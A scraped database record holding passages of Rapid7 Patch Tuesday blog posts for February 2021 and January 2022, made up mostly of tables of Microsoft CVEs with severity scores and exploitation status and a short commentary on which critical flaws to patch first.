PsExec Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-24105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24105>) | Package Managers Configurations Remote Code Execution Vulnerability | No | No | 8.4 | Yes \n[CVE-2021-24111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24111>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-1721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1721>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | Yes | 6.5 | No \n[CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>) | .NET Core Remote Code Execution Vulnerability | No | Yes | 8.1 | Yes \n[CVE-2021-24112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24112>) | .NET Core Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n \n#### ESU Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24080>) | Windows Trust Verification API Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>) | Windows TCP/IP Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-1734](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1734>) | Windows Remote Procedure Call Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-25195](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-25195>) | Windows PKU2U Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24088](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24088>) | Windows Local Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>) | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-24102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24102>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24103>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24078>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24083>) | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n#### Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24085>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-1730](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1730>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 5.4 | Yes \n \n#### Microsoft Dynamics Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1724](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1724>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 6.1 | No \n[CVE-2021-24101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24101>) | Microsoft Dataverse Information Disclosure Vulnerability | No | No | 6.5 | Yes \n \n#### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24073](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24073>) | Skype for Business and Lync Spoofing Vulnerability | No | No | 6.5 | No \n[CVE-2021-24099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24099>) | Skype for Business and Lync Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-24114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24114>) | Microsoft Teams iOS Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-1726](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1726>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2021-24072](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24072>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24066>) | Microsoft SharePoint Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24071](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24071>) | Microsoft SharePoint Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-24067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24067>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24068>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24069>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24070>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1728](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1728>) | System Center Operations Manager Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24092>) | Microsoft Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n#### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) | Windows Win32k Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-1698](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1698>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24075>) | Windows Network File System Denial of Service Vulnerability | No | No | 6.8 | No \n[CVE-2021-24084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24084>) | Windows Mobile Device Management Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24096>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24093>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>) | Windows DirectX Information Disclosure Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>) | Windows Console Driver Denial of Service Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-24091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24091>) | Windows Camera Codec Pack Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24079](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24079>) | Windows Backup Engine Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1731](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1731>) | PFX Encryption Security Feature Bypass Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24082>) | Microsoft.PowerShell.Utility Module WDAC Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-24076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24076>) | Microsoft Windows VMSwitch Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24081>) | Microsoft Windows Codecs Library Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n### Summary Charts\n\n\n\n________Note: _______Chart_______ data is reflective of data presented by Microsoft's CVRF at the time of writing.________", "cvss3": {}, "published": "2021-02-09T23:51:27", "type": "rapid7blog", "title": "Patch Tuesday - February 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2021-1639", "CVE-2021-1698", "CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1724", "CVE-2021-1726", "CVE-2021-1727", "CVE-2021-1728", "CVE-2021-1730", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-1734", "CVE-2021-21017", "CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-24066", "CVE-2021-24067", "CVE-2021-24068", "CVE-2021-24069", "CVE-2021-24070", "CVE-2021-24071", "CVE-2021-24072", "CVE-2021-24073", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24085", "CVE-2021-24086", "CVE-2021-24087", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24092", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24099", "CVE-2021-24100", "CVE-2021-24101", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24105", "CVE-2021-24106", "CVE-2021-24109", "CVE-2021-24111", "CVE-2021-24112", "CVE-2021-24113", "CVE-2021-24114", "CVE-2021-25195", "CVE-2021-26700", "CVE-2021-26701"], "modified": "2021-02-09T23:51:27", "id": "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "href": "https://blog.rapid7.com/2021/02/09/patch-tuesday-february-2021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T23:27:22", "description": "\n\nThe first Patch Tuesday of 2022 sees Microsoft publishing fixes for over 120 CVEs across the bulk of their product line, including 29 previously patched CVEs affecting their Edge browser via Chromium. None of these have yet been seen exploited in the wild, though six were publicly disclosed prior to today. This includes two Remote Code Execution (RCE) vulnerabilities in open source libraries that are bundled with more recent versions of Windows: [CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>), which affects the curl library, and [CVE-2021-36976](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>) which affects libarchive.\n\nThe majority of this month\u2019s patched vulnerabilities, such as [CVE-2022-21857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21857>) (affecting Active Directory Domain Services), allow attackers to elevate their privileges on systems or networks they already have a foothold in. \n\n### Critical RCEs\n\nBesides [CVE-2021-22947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-22947>) (libcurl), several other Critical RCE vulnerabilities were also fixed. Most of these have caveats that reduce their scariness to some degree. The worst of these is [CVE-2021-21907](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907>), affecting the Windows HTTP protocol stack. Although it carries a CVSSv3 base score of 9.8 and is considered potentially \u201cwormable\u201d by Microsoft, similar vulnerabilities have not proven to be rampantly exploited (see the AttackerKB analysis for [CVE-2021-31166](<https://attackerkb.com/topics/pZcouFxeCW/cve-2021-31166/rapid7-analysis>)).\n\nNot quite as bad is [CVE-2022-21840](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21840>), which affects all supported versions of Office, as well as Sharepoint Server. Exploitation would require social engineering to entice a victim to open an attachment or visit a malicious website \u2013 thankfully the Windows preview pane is not a vector for this attack.\n\n[CVE-2022-21846](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21846>) affects Exchange Server, but cannot be exploited directly over the public internet (attackers need to be \u201cadjacent\u201d to the target system in terms of network topology). This restriction also applies to [CVE-2022-21855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21855>) and [CVE-2022-21969](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21969>), two less severe RCEs in Exchange this month.\n\n[CVE-2022-21912](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21912>) and [CVE-2022-21898](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21898>) both affect DirectX Graphics and require local access. [CVE-2022-21917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21917>) is a vulnerability in the Windows Codecs library. In most cases, systems should automatically get patched; however, some organizations may have the vulnerable codec preinstalled on their gold images and disable Windows Store updates.\n\nDefenders should prioritize patching servers (Exchange, Sharepoint, Hyper-V, and IIS) followed by web browsers and other client software.\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Browser vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21930](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21930>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 4.2 | Yes \n[CVE-2022-21931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21931>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 4.2 | Yes \n[CVE-2022-21929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21929>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 2.5 | Yes \n[CVE-2022-21954](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21954>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 6.1 | Yes \n[CVE-2022-21970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21970>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 6.1 | Yes \n[CVE-2022-0120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0120>) | Chromium: CVE-2022-0120 Inappropriate implementation in Passwords | No | No | nan | Yes \n[CVE-2022-0118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0118>) | Chromium: CVE-2022-0118 Inappropriate implementation in WebShare | No | No | nan | Yes \n[CVE-2022-0117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0117>) | Chromium: CVE-2022-0117 Policy bypass in Service Workers | No | No | nan | Yes \n[CVE-2022-0116](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0116>) | Chromium: CVE-2022-0116 Inappropriate implementation in Compositing | No | No | nan | Yes \n[CVE-2022-0115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0115>) | Chromium: CVE-2022-0115 Uninitialized Use in File API | No | No | nan | Yes \n[CVE-2022-0114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0114>) | Chromium: CVE-2022-0114 Out of bounds memory access in Web Serial | No | No | nan | Yes \n[CVE-2022-0113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0113>) | Chromium: CVE-2022-0113 Inappropriate implementation in Blink | No | No | nan | Yes \n[CVE-2022-0112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0112>) | Chromium: CVE-2022-0112 Incorrect security UI in Browser UI | No | No | nan | Yes \n[CVE-2022-0111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0111>) | Chromium: CVE-2022-0111 Inappropriate implementation in Navigation | No | No | nan | Yes \n[CVE-2022-0110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0110>) | Chromium: CVE-2022-0110 Incorrect security UI in Autofill | No | No | nan | Yes \n[CVE-2022-0109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0109>) | Chromium: CVE-2022-0109 Inappropriate implementation in Autofill | No | No | nan | Yes \n[CVE-2022-0108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0108>) | Chromium: CVE-2022-0108 Inappropriate implementation in Navigation | No | No | nan | Yes \n[CVE-2022-0107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0107>) | Chromium: CVE-2022-0107 Use after free in File Manager API | No | No | nan | Yes \n[CVE-2022-0106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0106>) | Chromium: CVE-2022-0106 Use after free in Autofill | No | No | nan | Yes \n[CVE-2022-0105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0105>) | Chromium: CVE-2022-0105 Use after free in PDF | No | No | nan | Yes \n[CVE-2022-0104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0104>) | Chromium: CVE-2022-0104 Heap buffer overflow in ANGLE | No | No | nan | Yes \n[CVE-2022-0103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0103>) | Chromium: CVE-2022-0103 Use after free in SwiftShader | No | No | nan | Yes \n[CVE-2022-0102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0102>) | Chromium: CVE-2022-0102 Type Confusion in V8 | No | No | nan | Yes \n[CVE-2022-0101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0101>) | Chromium: CVE-2022-0101 Heap buffer overflow in Bookmarks | No | No | nan | Yes \n[CVE-2022-0100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0100>) | Chromium: CVE-2022-0100 Heap buffer overflow in Media streams API | No | No | nan | Yes \n[CVE-2022-0099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0099>) | Chromium: CVE-2022-0099 Use after free in Sign-in | No | No | nan | Yes \n[CVE-2022-0098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0098>) | Chromium: CVE-2022-0098 Use after free in Screen Capture | No | No | nan | Yes \n[CVE-2022-0097](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0097>) | Chromium: CVE-2022-0097 Inappropriate implementation in DevTools | No | No | nan | Yes \n[CVE-2022-0096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0096>) | Chromium: CVE-2022-0096 Use after free in Storage | No | No | nan | Yes \n \n### Developer Tools vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21911](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21911>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n \n### ESU Windows vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21924](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21924>) | Workstation Service Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2022-21834](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21834>) | Windows User-mode Driver Framework Reflector Driver Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21919](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21919>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | Yes | 7 | No \n[CVE-2022-21885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21885>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21914](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21914>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21920](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21920>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21908>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21843](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21843>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21883>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21848](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21848>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21889>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21890>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21900>) | Windows Hyper-V Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2022-21905](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21905>) | Windows Hyper-V Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2022-21880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21880>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21915>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-21904](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21904>) | Windows GDI Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21903](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21903>) | Windows GDI Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21899>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 5.5 | No \n[CVE-2022-21916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21916>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21897>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21838](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21838>) | Windows Cleanup Manager Elevation of Privilege Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21836](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21836>) | Windows Certificate Spoofing Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2022-21925](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21925>) | Windows BackupKey Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2022-21862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21862>) | Windows Application Model Core API Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21859>) | Windows Accounts Control Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21833](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21833>) | Virtual Machine IDE Drive Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21922](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21922>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21893>) | Remote Desktop Protocol Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21850](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21850>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21851](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21851>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21835](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21835>) | Microsoft Cryptographic Services Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21884>) | Local Security Authority Subsystem Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21913](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21913>) | Local Security Authority (Domain Policy) Remote Protocol Security Feature Bypass | No | No | 5.3 | No \n[CVE-2022-21857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21857>) | Active Directory Domain Services Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n### Exchange Server vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21846](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21846>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2022-21855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2022-21969](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21969>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n \n### Microsoft Dynamics vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21932>) | Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability | No | No | 7.6 | No \n[CVE-2022-21891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21891>) | Microsoft Dynamics 365 (on-premises) Spoofing Vulnerability | No | No | 7.6 | No \n \n### Microsoft Office vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21842](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21842>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21837](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21837>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-21840](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21840>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21841>) | Microsoft Excel 